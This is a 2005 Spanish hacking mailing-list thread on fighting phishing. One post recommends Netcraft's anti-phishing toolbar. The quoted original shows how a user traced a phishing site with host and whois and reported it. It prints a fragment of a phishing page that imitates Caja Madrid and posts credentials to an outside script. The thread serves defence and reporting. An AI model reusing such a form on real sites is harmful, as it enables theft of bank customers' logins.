[HACK] Luchar contra el phising - ¿ Cómo ?
Javier Turégano
javi at ideando.net
Tue Jun 14 13:02:09 CEST 2005
El otro día navegando por la web de Netcraft encontré que han
desarrollado una barra de herramientas anti-phising. Me decidí a
probarla y me pareció bastante interesante. Incluso detectó y bloqueó un
correo de phising del BBVA que llegó a mi buzón. Además creo que permite
notificar de páginas que realizan estos ataques. Por otro lado da
información muy util (procedente del whois del sitio) como la red y pais
en la que está alojado el servidor, etc.
Para los que os animeis a probarla:
http://toolbar.netcraft.com/
http://toolbar.netcraft.com/
http://toolbar.netcraft.com/
Un saludo.
Javier Turégano.
El lun, 13-06-2005 a las 19:27 +0200, zumbi escribió:
> Hola listeros,
>
> * Problema:
>
> Lucha contra el phising.
>
> * Posible solución:
>
> Hasta ahora he localizado dónde se encontraba el servidor fraudulento
> y he ido notificando a los administradores de los sistemas que tenían
> hospedada una página que se dedicaba al fraude. Por ejemplo,
>
> 1. Me llega un correo que me pide claves de usuario, le doy a Enviar
> y me lleva a la web del banco.
> Si se lee en html del fichero nos encontramos con la siguiente
> línea:
>
> <--! snipet -->
>
> <form name="f1" method="post" action="http://www.testsway.com/script.php">
> <table align="center" border="0" width="590"><tbody><tr><td
> align="center" valig
> n="top" width="275">
> <table border="0" cellpadding="0" cellspacing="0"
> width="239"><tbody><tr><td><im
> g alt="Caja Madrid"
> src="https://oi.cajamadrid.es/CajaMadrid/oi/imagenes/logocm.
> gif" border="0" height="43" vspace="13"
> width="115"></td></tr><tr><td><img alt="
> " src="https://oi.cajamadrid.es/CajaMadrid/oi/imagenes/imagengr.jpg"
> border="0"
> height="106" width="239"></td></tr><tr><td height="55"
> valign="bottom"><img alt=
> "Oficina Internet | Caja Madrid"
> src="https://oi.cajamadrid.es/CajaMadrid/oi/ima
> genes/logooi_08.gif" border="0" height="42"
> width="239"></td></tr></tbody></tabl
> e>
>
> <--! end snipet -->
>
> Buscando la cadena form nos indica donde se enviará el formulario:
> http://www.testsway.com/script.php
>
> $ host www.testsway.com
> www.testsway.com A xx.235.220.67
>
> $ whois xx.235.220.67
> --> Obtendremos el correo electrónico donde podemos denunciar este
> hecho al administrador para que obrando de buena voluntad, retire la
> página web de su dominio.
>
> 2. En otras ocasiones no hará ni falta mirar el html, pues
> directamente, el correo te dirigirá al site malintencionado. Se procede
> con el host y el whois y podemos denunciar estos hechos al administrador
> del sistema.
>
>
> * Pegas:
>
> Resulta que he estado denunciando estos hechos, pero después de unas
> cuantas páginas retiradas me empiezo a cansar de hacerlo. Entonces me
> gustaría preguntarles si alguno conoce alguna herramienta libre que
> realize este proceso o si no existiera a alguno se le ocurre que se
> podría hacer para luchar contra esto.
>
> ¿ Alguno de ustedes conoce alguna forma alternativa de obrar que
> merezca la pena, notificarlo al banco, a policia.es, ... ?
>
>
> Gracias por su atención,
> zumbi
>
>
> ______________________________________________
> Renovamos el Correo Yahoo!
> Nuevos servicios, más seguridad
> http://correo.yahoo.es
> _______________________________________________
> Lista - http://mailman.argo.es/listinfo/hacking
> FAQ - http://www.argo.es/~jcea/artic/hack-faq.htm
> "una-al-dia" para estar siempre informado - http://www.hispasec.com/
>
More information about the hacking
mailing list